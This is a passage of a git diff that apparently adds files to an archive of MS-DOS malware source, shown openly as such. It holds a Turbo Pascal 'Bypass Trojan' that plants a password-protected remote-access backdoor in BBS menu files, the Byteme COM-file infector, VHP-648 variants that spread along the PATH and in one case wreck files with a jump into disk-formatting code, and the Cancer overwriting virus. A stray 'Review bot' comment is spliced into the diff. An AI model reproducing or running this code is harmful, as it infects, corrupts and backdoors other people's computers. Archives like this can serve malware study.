+ + + + + + Source: + +PROGRAM BYPASS1; +{ Bypass Trojan v1.0 } +{ Created by: M顩H掞!X [NuKE] } +{ Created on: 27/09/91 } +USES DOS; +VAR + Target : SEARCHREC; + T : TEXT; +PROCEDURE DIRECT (PATH : STRING); +VAR + PATH2 : STRING; + INFO : SEARCHREC; + INFO2 : SEARCHREC; + F : TEXT; +BEGIN + Findfirst (PATH + '\*.*',$10,INFO); + WHILE DOSERROR = 0 DO + BEGIN + IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN + Begin + PATH2 := PATH + '\' + INFO.NAME; + Chdir (PATH2); + Findfirst ('MAIN.MNU',($3F - $10),INFO2); { Or any .MNU you wish } + WHILE DOSERROR = 0 DO + Begin + ASSIGN (F,INFO2.NAME); + Setfattr (F,$20); + Append (F); + Writeln (F,' '); + Writeln (F,' '); + Writeln (F,'#'); { Key to add } + Writeln (F,' '); + Writeln (F,'-$'); + Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password } + Writeln (F,' '); + Writeln (F,' '); + Writeln (F,' '); + Writeln (F,'#'); { Key to add } + Writeln (F,' '); + Writeln (F,'D-'); + Writeln (F,'REMOTE.BAT'); + Close (F); + Findnext(INFO2); + End; + DIRECT (PATH2); + End; + Findnext(INFO); + End; + END; +PROCEDURE FILEFIND (DRIVE : CHAR); +BEGIN + Chdir (DRIVE + ':\'); + Findfirst ('MAIN.MNU',($3F - $10),Target); { Or any .MNU you wish } + WHILE DOSERROR = 0 DO + Begin + ASSIGN (T,Target.name); + Setfattr (T,$20); + {$I-} + Append (T); + {$I+} + IF IORESULT = 0 THEN + Begin + Writeln (T,' '); + Writeln (T,'#'); { Key to add } + Writeln (T,' '); + Writeln (T,'-$'); + Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password } + Writeln (T,' '); + Writeln (T,' '); + Writeln (T,' '); + Writeln (T,'#'); { Key to add } + Writeln (T,' '); + Writeln (T,'D-'); + Writeln (T,'REMOTE.BAT'); + Close (T); + End + ELSE + Exit; + Findnext (Target); + End; + DIRECT (DRIVE + ':'); +END; +BEGIN + {$I-} + Chdir ('C:\'); + {$I+} + IF IORESULT = 0 THEN + FILEFIND ('C'); + {$I-} + Chdir ('D:\'); + {$I+} + IF IORESULT = 0 THEN + FILEFIND ('D'); + {$I-} + Chdir ('E:\'); + {$I+} + IF IORESULT = 0 THEN + FILEFIND ('E'); +END. 
+ + Well there it is. Please feel free to improve it in anyway you like. I will + soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and + creates one if needed. The REMOTE.BAT file also has the Hidden attribute to + try and hide it from the SysOp. The reason for this, is that smart SysOps, and + any of those who are reading this, rename the REMOTE.BAT or remove it, to + avoid this sort of trojan. The original release is for a modem on Com2. If you + wish to have the trojan for another device, either edit it in the .EXE, or + contact me (Mechanix) on any [NuKE] board, and I will recompile the source for + you with another device. + + Mechanix [NuKE] + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.byteme.asm b/MSDOS/Virus.MSDOS.Unknown.byteme.asm new file mode 100644 index 00000000..0fde67b1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.byteme.asm 
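Review bot: This file holds a text article with an embedded Turbo Pascal program (`PROGRAM BYPASS1;` through `END.`) and no assembly at all, so the `.asm` extension on `MSDOS/Virus.MSDOS.Unknown.bypass.asm` misleads anyone filtering or batch-assembling the corpus by extension; `.txt` would describe the content honestly. The banner line names "Bypass Trojan v1.0 and v2.0" while the body states that only the v1.0 source is included and v2.0 is to follow, which the title could reflect. The banner itself is mis-encoded (the box-drawing bytes render as CJK characters), so a plain-ASCII first line such as `Bypass Trojan v1.0 - Telegard MAIN.MNU backdoor (Turbo Pascal source, text article)` would survive re-encoding and tell readers what the file is.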
@@ -0,0 +1,281 @@ +; Byteme Appending Note Vir -- Byte Me, Dude.... +; Written by The Weasel! + +virus_type equ 0 ; Appending Virus +is_encrypted equ 0 ; We're not encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + + lea si,[di + data00] ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? 
+ je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + + call search_files ; Find and infect a file + + +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? 
+ je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! 
+ jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. 
function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,040h ; DOS write to file function + mov cx,3 ; CX holds bytes to write (3) + lea dx,[di + new_jump] ; DX points to the jump we made + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + mov ah,040h ; DOS write to file function + mov cx,finish - start ; CX holds virus length + lea dx,[di + start] ; DX points to start of virus + int 021h + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +set_carry db ? ; Set-carry-on-exit flag +buffer db 090h,0CDh,020h ; Buffer to hold old three bytes +new_jump db 0E9h,?,? ; New jump to virus +infect_file endp + + +data00 db "BYTE M. ",0 +  +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Byte Me, Loser..." + +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.c-623.asm b/MSDOS/Virus.MSDOS.Unknown.c-623.asm new file mode 100644 index 00000000..caed7403 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-623.asm 
@@ -0,0 +1,319 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + . . . +virus: + push cx ;Save CX + mov dx,offset data ;Restore original first instruction + ; before each contamination +modify equ $-2 ;The instruction above is changed + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH=' in the environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + 
mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + and cx,0FFFE ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). Now this code is disabled. + + jmp short n_000266 ;CHANGED. 
Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) 
+ + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-627.asm b/MSDOS/Virus.MSDOS.Unknown.c-627.asm new file mode 100644 index 00000000..a288edaa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-627.asm 
@@ -0,0 +1,330 @@ + name Virus + title Virus; based on the famous VHP-648 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + int 20 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 3 dup (90) ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +codeptr dw ? ;Here is formed a jump to virus code +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file. +;It's a jmp instruction into the hard disk formatting program (IBM XT only): + +bad_jmp db 0EA,0,0,0,0C8 +errhnd dd ? + +virus: + push cx ;Save CX + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ;before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? 
+ jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov [si+dtaaddr-data],bx ;Save it in dtaaddr + mov [si+dtaaddr+2-data],es + + mov ax,3524 ;Get interrupt 24h handler + int 21 ; and save it in errhnd + mov [si+errhnd-data],bx + mov [si+errhnd+2-data],es + pop es ;Restore ES + + mov ax,2524 ;Set interrupt 24h handler + mov dx,si + add dx,handler-data + int 21 + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + xor di,di +n_00015A: ;Search 'PATH' in environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+poffs-data],di ;Save 'PATH' offset in poffs + mov bx,si ;Point BX at data area + add si,fname-data ;Point SI & DI at fname + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+poffs-data],6C + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+poffs-data] + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + xor si,si +n_0001B0: + pop bx + pop ds + mov [bx+poffs-data],si + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+eqoffs-data],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cl,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cl,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find 
next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+time-data] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + +;Is file size greather than 64,000 bytes? + + cmp [si+fsize-data],64000d + ja findnext ;If so, search for next file + +;Is file size less than 10 bytes? + + cmp word ptr [si+fsize-data],10d + jb findnext ;If so, search for next file + + mov di,[si+eqoffs-data] + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+fattrib-data],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + and cl,not 1 ;Turn off Read Only flag + int 21 + + mov ax,3D02 ;Open file with Read/Write access + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+ftime-data],cx ;Save time in ftime + mov [si+fdate-data],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + jnz n_000266 ;If not, contaminate file (don't destroy): + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? 
+ jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + xor cx,cx ;0 bytes from end + xor dx,dx + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer (file size) + add ax,virus-data-3 ;Add virus data length to get code offset + mov [si+codeptr-data],ax ;Save result in codeptr + inc ch ;Add 100h to CX + mov di,si + add di,modify-data ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,endcode-data ;Virus code length as bytes to be written + mov dx,si ;Write from data to endcode + int 21 + jc oldtime ;Exit on error + cmp ax,endcode-data ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + xor cx,cx ;Just at the file beginning + xor dx,dx + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cl,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+fdate-data] ;Restore file date + mov cx,[si+ftime-data] ; and time + and cl,not 11111b + or cl,11111b ;Set seconds to 62 (?!) 
+ + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+fattrib-data] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+dtaaddr-data] ;Restore saved DTA + mov ds,[si+dtaaddr+2-data] + int 21 + + mov ax,2524 ;Set interrupt 24h handler + mov dx,[si+errhnd-data] ;Restore saved handler + mov ds,[si+errhnd+2-data] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +handler: ;Critical error handler + mov al,0 ;Just ignore error + iret ; and return + +endcode label byte + code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-740.asm b/MSDOS/Virus.MSDOS.Unknown.c-740.asm new file mode 100644 index 00000000..8892ea8e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-740.asm 
@@ -0,0 +1,127 @@ + page ,132 + name CANCER + title Cancer - a mutation of the V-847 virus + .radix 16 + code segment + assume cs:code,ds:code + org 100 + +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start + +start: + jmp cancer + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng db virlen +n_10D db 3 ;Unused +progbeg dd ? +eof dw ? +handle dw ? + +cancer: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + 
rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + db 0 ;Unused + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.c-740b.asm b/MSDOS/Virus.MSDOS.Unknown.c-740b.asm new file mode 100644 index 00000000..8892ea8e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.c-740b.asm 
